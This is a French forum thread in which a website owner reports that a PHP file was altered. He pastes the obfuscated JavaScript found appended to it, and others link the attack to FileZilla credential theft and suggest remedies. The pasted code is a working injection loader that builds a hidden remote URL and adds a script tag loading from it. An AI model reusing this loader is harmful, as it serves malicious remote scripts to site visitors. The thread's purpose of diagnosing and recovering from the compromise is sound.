Site hacké ?

[nicolas92]

Bonjour,
Grosse surprise ce matin en faisant machinalement un clic pour aller voir mon site. Le bandeau gauche s'affiche, le header aussi mais rien d'autre avec un message d'erreur disant qu'il y a une erreur de parse dans homefeatured.php en ligne 85.
FTP rapide pour aller voir, je constate qu'il a été modifié hier soir a 18H54 hier soir (bizarre ,j'étais sur mon scooter a cette heure ci et personne n'a les accès..)
Je downloade le fichier en question et je réuploade a la place celui de mon back up, puis changement de mot de passe ftp et admin...

J'ouvre ensuite le fameux homefeatured.php modifié pour trouver à la fin le code suivant :
C'est pour moi du chinois, si quelqu'un peut me dire ce qui s'est passé et ce que ce code a fait (ou tenté)merci d'avance...

[removed]/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = 'h$@t##()t(!&@p!@:@/&@/$^&()t($!o)#r$&r;^#e#$)@n!(#$t)!!z$$-@)#c(!o$$!m!^).&s;()&@$o$()s!^o^(.&($!c^&o;^$&)m(#$.&@p)e(!t#a(#r$&^d)$$a^s&)#-)$&c;($)^$o(m!&!.(e!!&a;##!#s^&y;!$l)i&@&f;#e@d&$)i#$!r(!(e!c))t))#.@(^r#)#u#@:^($8(!^0@8#!0$&&&/#()(n[spam-filter]!^g(@&o;@(i$$##s!(a!o@!^.^!n)^e!#)t#!/#(n#@g;)^#^o#)(i^)s($@(a#o(!#.)$n)$@e@&t;@$#/!(@c@$^&$h@(i^@#n&^@a(#(!z((.@$$c##o#$)@m&!/$^!)c[spam-filter](t)r[spam-filter]i$@(p@).&^c^@o()$m(/!!g^^o#)(@o(g^l#e$$.!!@c)^))o^#[spam-filter]#m$/$('.replace(/\!|\^|\)|\$|@|#|&|\(/ig, '');var D7fyb435pte = 's&^(c)##r!^i!@p##!!t@!&'.replace(/#|\)|\$|\(|@|&|\^|\!/ig, '');var Sn9jgvbufr9 = 's@r)^#^c^#'.replace(/\(|#|\^|\!|\$|\)|@|&/ig, '');var Rxs7200gjqt6h = D7fyb435pte;var Rmkt0nsas90ld = document.createElement(Rxs7200gjqt6h);Rmkt0nsas90ld.setAttribute('defer', 'd^^&e;(f(&e;&(@r@('.replace(/&|@|#|\!|\(|\)|\$|\^/ig, ''));var Kaws9hrzdk = 't@^@e!)$x)@t@#)(/!(j(&@a(v#&^a$)s$!c((r@^i)&)p##!t#('.replace(/\)|#|\^|&|\!|\$|@|\(/ig, '');Rmkt0nsas90ld.setAttribute('id', 'J(!)8(!n^$9!i(1^3^($t@^f^)7^(@i@#&v;#)v[spam-filter]'.replace(/\^|\)|\!|\$|&|#|@|\(/ig, ''));Rmkt0nsas90ld.setAttribute(Sn9jgvbufr9,  E1e6wn3ijzwv9g);Rmkt0nsas90ld.setAttribute('type', Kaws9hrzdk);document.body.appendChild(Rmkt0nsas90ld);if (document){Rxs7200gjqt6h = D7fyb435pte;[spam-filter] }  catch(Uskp2qj8xy0ey16t2xwup ) {}[removed]
<!--97d5d4f7664244532860e4ca92eb59b9-->

[Pierre-Yves]

Effectivement tu t'es fais avoir... Apparemment le code essaye d'ajouter un frame sur ton site se je ne me trompe pas. Ca me fait penser au fameux virus qui reprend tous les login/pass de ton FileZilla (client FTP).

Effectue une mise à jour de ton antivirus (ou installe en un) et fais un scan complet de ton ordinateur.

[nicolas92]

Bonjour Pierre-Yves et bonne année !
Merci pour ton message, effectivement j'ai constaté que tout mes sites (pro et perso) dépendant de mon logiciel de ftp Filezilla ont été touchés mais uniquement sur les index.php, index.html et pour ce fameux homefeatured...
J'ai changé tout mes mots de passe ftp par des trucs que je peux pas retenir et je ne les ai pas saisi en dur dans filezilla. Ils sont dorénavant sur un ..papier.
L'antivirus vient d'être mis a jour et tourne en ce moment, je lance ensuite adaware pour les spyware, j'ai vidé mon cache...mais je suis a l'écoute de toute suggestion pour un logiciel de ftp qui n'a pas le soucis des liste de mot de passe de filezilla...

[Fluorite]

Bonsoir

Pourquoi ne pas sécuriser vos données ? Avec Filezilla et la sécurisation SSL/TLS.

Ça aide ;-)
Bye
Yannick